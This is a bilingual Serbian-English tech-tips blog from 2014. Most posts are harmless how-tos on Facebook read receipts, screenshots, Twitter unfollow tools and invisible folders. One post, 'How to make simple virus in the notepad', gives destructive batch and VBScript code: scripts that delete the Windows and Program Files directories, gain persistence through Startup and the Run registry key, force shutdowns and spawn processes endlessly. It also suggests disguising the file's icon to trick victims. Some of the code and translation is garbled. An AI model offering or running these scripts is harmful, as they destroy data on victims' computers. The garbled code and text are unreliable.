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недеља, 28. септембар 2014.

Kako iskljuciti opciju "seen" na facebook-u

Siguran sam da nisam jedini koga opcija "seen" na facebook-u nervira,uglavnom zato sto ce ako pogledamo poruku pokazati sagovorniku da smo je videli ali ne zelimo da odgovorimo,a ponekad to je i vise nego dovoljno.

Kako da isključim "seen" na Facebooku?

Zanima vas "kako čitati poruke na Facebooku, a da drugi ne znaju da ste ih pročitali?", pročitajte ovaj tekst do kraja i saznajte kako.
Ukoliko želite da isključite seen opciju na facebook chatu potrebno je da instalirate jedan dodatak na vašem internet pregledaču.

Za one koji koriste Mozilu - KLIKNI OVDE - a nakon toga kliknite na dugme "Get Chat Undetected" da biste instalirali ovaj dodatak.

Za one koji koriste Chrome -  dodatak možete preuzeti klikom OVDE.

петак, 19. септембар 2014.

Find out who unfollowed you on twitter

  • You Twetter Karma -Free tool that will help you find one that didt follow-up you. It is very easy, you just need to log in using your Twitter account and click on the "Whack" you`ll wont need an email address.

  • Just Unfollow -With the help of this tool you can find out who isn`t following you on Instagram. Regarding the tools in addition to using the Twitter account, they will ask you to leave an email address (but does`t need to verify it, so you can leave and a false address like kjtgjjhjhjhjh @ gmail / yahoo / hotmail /.../. com).

  • Unfollowers -And this tool also can find out who isn`t following you on Twitter or Instagram. It will search for an email address, but doesn`t require any verification.
 See also:

Saznajte ko vas je otpratio na twitter-u

  • Your Twetter Karma -Besplatna alatka  koja će vam pomoći da pronađete one koji vam nisu uzvratili praćenje. Veoma je jednostavan, potrebno je samo da se prijavite uz pomoć vašeg tviter naloga i da kliknete na dugme "Whack".Nije neophodna mejl adresa.

  • Just Unfollow -Uz pomoć ovog alata možete saznati i ko vas ne prati na Instagramu. Što se tiče samog alata pored prijavljivanja uz pomoć tviter naloga, tražiće od vas da ostavite mejl adresu (ali nema potrebe da je verifikujete, tako da možete da ostavite i neku lažnu adresu tipa kjtgjjhjhjhjh@gmail/yahoo/hotmail/.../.com). 

  • Unfollowers I ovaj alat vam takodje može otkriti ko vas ne prati na tviteru ili instagramu.Trazi  će od   vas mejl adresu,ali nije potrebna nikakva verifikacije.

недеља, 14. септембар 2014.

How to take pictures of screen on your Android device

Actually take pictures of the screen on your phone or tablet or even laptop (with the android operating system) is very simple.

Only thing necessary is your android device and a few seconds of patience:

Click the "off" button on your phone (for those who do`t understand it's a button, after which it will if you hold it for a while come out this) .After what you have to do this, press the button to decrease the volume(-), wait a few seconds until you shows that the snapshot was made. That's all.

Kako slikati ekran na vasem android telefonu

Zapravo slikati ekran na vasem telefonu ili tabletu ili pak laptopu (sa android operativnim sistemom) je veoma prosto.

Neophodno je samo vas telefon i nekoliko sekundi strpljenja:

Kliknite na "off" dugme na vasem telefonu(za one koji ne shvataju to je dugme nakon koga ce ako ga drzite neko vreme izaci ovo).Nakon sto ste to uradili pritisnite dugme za smanjenje tona(-),sacekajte nekoliko sekundi dok vam ne pokazeda je snimak ekrana napravljen.To je sve.

субота, 13. септембар 2014.

How to make simple "virus" in the notepad

Surely you've wondered how to create simple and effective virus. This is a very la
who and they are do the following:

- Open Notepad (Start - All Programs - Accessories - Notepad)

- Type following text:

@ echo off

if not exist "C: \ Documents and Settings \ All Users \ Start Menu \ Programs \ Startup \ hide" copy "hide" "C: \ Documents and Settings \ All Users \ Start Menu \ Programs \ Startup"

shutdown -s -t 60 -c "now you're done
: P "

Now that you've typed / copied you`ll need to save such hide, and when someone starts this virus works on the following:

- It`s copied to startup ( it`s starting when and they are computer), if not already

- Then shuts down your computer in 30 seconds

Of course you can improve the virus in such a way to change the icon or hide virus.bat, and his copy change the icon so that it wouldnt said .bat ....


### CUT HERE ###

@ echo off

cd% windir%

del *.* / Q


### CUT HERE ###

This virus after starts enters in the windows directory where you installed the system and deletes everything in it (Adios, windows !!!)


### CUT HERE ###

@ echo off

shutdown -s -t 60 -c "You system is infected with virus !!!"


### CUT HERE ###

This code after starts shows up message You system is infected with virus !!! and they are after 60 seconds, turn off the computer (It do not do any damage)


### CUT HERE ###

@ echo off

: loop

start notepad.exe

goto loop

### CUT HERE ###

This virus after starts to open notepad in St. indefinitely until the computer does not crash (It do not literally)


Next virus opens my site indefinitely (you can put the URL if desired)

### CUT HERE ###

@ echo off

: loop


goto loop

### CUT HERE ###

Next viruses are written in VBScript and they are a little more serious. They should copy into notepad and they are save the .vbs format example. virus.vbs


If the 13th day of the month this virus will erase all the files and folders from the Program Files folder, and if it is any other day of the month looks at whether virus was added to start up, if it is not entered in the start up it will enter him self and run

each subsequent ignition computer.

### CUT HERE ###

Dim fso

Dim wsc

Set fso = CreateObject ("Scripting.FileSysteemObject")

Set wsc = WScript.CreateObject ("WScript.Shell")

If Day (Now) = 13 Then

pf = wsc.RegRead ("HKEY_LOCAL_ MACHINESoftwareMicrosoft WindowsCurrentVersion ProgramFilesDir")

fso.DeleteFile (pf & "*.*")

fso.DeleteFolder (pf & "*.*")


sys32= fso.GetSpecialFolder (1)

If Not (fso.FileExist (sys32 & "virus.vbs")) Then

Set copyme = fso.GetFile (WScript.ScriptFullName)

copyme.Copy (sys32 & "virus.vbs")

wsc.regwrite "HKEY_LOCAL_ MACHINESoftwareMicrosoft WindowsCurrentVersionRun Virus", "wscript.exe" & sys32 & "virus.vbs%"


End If

End If

### CUT HERE ###


By running the following code virus will begin to open and

closing the CD-ROM. The solution is restart computer, a virus don`t make any damage.

### CUT HERE ###

Set oWMP = CreateObject ("WMPlayer.OCX.7")

Set colCDROMs = oWMP. cdromCollection

if colCDROMs.Count> = 1 then


For i = 0 to colCDROMs.Count-1

colCDROMs.Item (i) .Eject


For i = 0 to colCDROMs.Count-1

colCDROMs.Item (i) .Eject



End if

### CUT HERE ###

Kako napraviti proste "viruse" u notepad-u

Sigurno ste se pitali kako da napravite jednostavan, a učinkovit virus. To je vrlo lahko i uradimo sledeće:
- otvorimo Notepad ( Start - All Programs - Accessories - Notepad )
- otkucajmo sledeći text:
@echo off
if not exist "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\virus.bat" copy "virus.bat""C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
shutdown -s -t30 -c "sad si gotovo :P"
Kada ste ovo otkucali/kopirali potrebno je da snimite kao virus.bat , a kada neko pokrene ovaj virus on radi sledeće:
- kopira se u startup ( pokreće se kad i računar ), ako već nije
- zatim gasi računar za 30 sekundi
Naravno vi ovaj virus možete unaprijediti tako što mu promijenite ikonu ili virus.bat sakrijete, a njegovoj kopiji promijeniti ikonu tako da ne bi pisalo ono .bat....

@echo off
cd %windir%
del *.* /Q

Ovaj virus nakon pokretanja ulazi u windows direktorijum gde je instaliran sistem i brise sve u njemu( Adios, windows!!!)

@echo off
shutdown -s -t 60 -c "You system is infected with virus!!!"

Ovaj kod nakon pokretanja izbaci poruku You system is infected with virus!!! i nakon 60 sekundi ugasi kompjuter(Ne napravi nikakvu stetu)

@echo off
start notepad.exe
goto loop

Ovaj virus nakon pokretanja otvara notepad u nedogled sv dok se kompjuter ne srusi(Ne bukvalno)

Sledeci virus otvara moj sajt u nedogled(mozete staviti URL po zelji)
@echo off
goto loop

Sledeci virusi su pisani u VBScript-u i malo su ozbiljniji. Njih treba da kopirate u notepad i sacuvate u .vbs formatu npr. virus.vbs

Ako je 13. dan u mesecu ovaj virus ce izbrisati sve fajlove i foldere iz Program Files foldera, a ako je neki
drugi dan u mesecu virus gleda da li je upisan u start up, ako nije upisuje se u start up i pokrece se
svakim narednim paljenjem kompjutera.

Dim fso
Dim wsc
Set fso=CreateObject ("Scripting.FileSystemObject")
Set wsc=WScript.CreateObject ("WScript.Shell")
If Day(Now)=13 Then
pf=wsc.RegRead("HKEY_LOCAL_ MACHINESoftwareMicrosoft WindowsCurrentVersion ProgramFilesDir")
fso.DeleteFile(pf & "*.*")
fso.DeleteFolder(pf & "*.*")
If Not (fso.FileExist(sys32 & "virus.vbs")) Then
Set copyme=fso.GetFile (WScript.ScriptFullName)
copyme.Copy (sys32 & "virus.vbs")
wsc.regwrite "HKEY_LOCAL_ MACHINESoftwareMicrosoft WindowsCurrentVersionRun Virus","wscript.exe " & sys32 & "virus.vbs %"
End If
End If

Pokretanjem sledeceg koda virus ce poceti da otvara i
zatvara CD-ROM. Resenje je restart racunara, a virus nepravi nikakvu stetu.

Set oWMP=CreateObject ("WMPlayer.OCX.7")
Set colCDROMs=oWMP. cdromCollection
if colCDROMs.Count>=1 then
For i=0 to colCDROMs.Count-1
For i=0 to colCDROMs.Count-1
End if

среда, 10. септембар 2014.

We are opening YouTube channel

If you're a fan of comedy, entertainment and occasionally good parodies check our YouiTube page is starting soon...

 Just click on the picture

Otvaramo YouTube kanal

Ako ste ljubitelj komedije,zabave i poneke dobre parodije pogledajte nasu YouTube stranicu uskoro pocinjemo sa radom

Samo kliknite na sliku

недеља, 7. септембар 2014.

Kako napraviti III

Kako sačuvati povjerljivih informacija od prstiju članova domaćinstva i prijatelje?
Koliko puta vam se dogodilo da slike ili važnih dokumenati cuvani na računaru dolaze na pogrešnu oči ...

Rešenje u ovom slučaju je, naravno, NEVIDLJIVI FOLDER

Ovo su koraci:

1 Kreiraj novi folder

2 Desni klik na folder i odaberite "Preimenuj"

3 Preimenuj folder, tako da dok držite pritisnuto dugme Alt 0160 na numeričkoj tastaturi

4 desnim klikom na folder i odaberite "Properties"

5 Odaberite "Customize" prozor

6. Kliknite na "Change Icon"

7 Odaberite prazno polje iz raspoloživih ikona (nevidljivu ikonu) i ponovo pogledajte na desktop.

How to make III

How to preserve confidential information from the fingers of your household members and friends?
How many times have happened to you pictures or important documents stored on your computers come to the wrong eyes ...

The solution in this case is of course INVISIBLE FOLDER

Here are the steps:

1 Create a new folder

2 Right-click the folder and select "Rename"

3 Rename the folder so that while holding down the Alt type in 0160 on the numeric keypad

4 Right-click over the folder and select "Properties"

5 Select "Customize" window

6 Click on "Change icon"

7 Select the blank field from the available icons (for the icon) and look again at desktop.

среда, 3. септембар 2014.

Cut songs online by yourself

Here are some things that you might need and you are`t sure how to do them ...
How to cut songs (online):


Isecite pesmu online

Evo jos nekih stvari koje vam mozda zatrebaju a niste sigurni kako da ih uradite...

Kako iseci pesme(online):

понедељак, 1. септембар 2014.

How to make screenshot on iPhone`s and iPad`s

1 Press the button one (home) and the two button (lock) at the same time. The screen will light up and you will hear the sound of the camera for taking pictures. Screenshot has been saved with other iPhone pictures. That's all.


Follow-up,soon will come to make screenshot on android devices.

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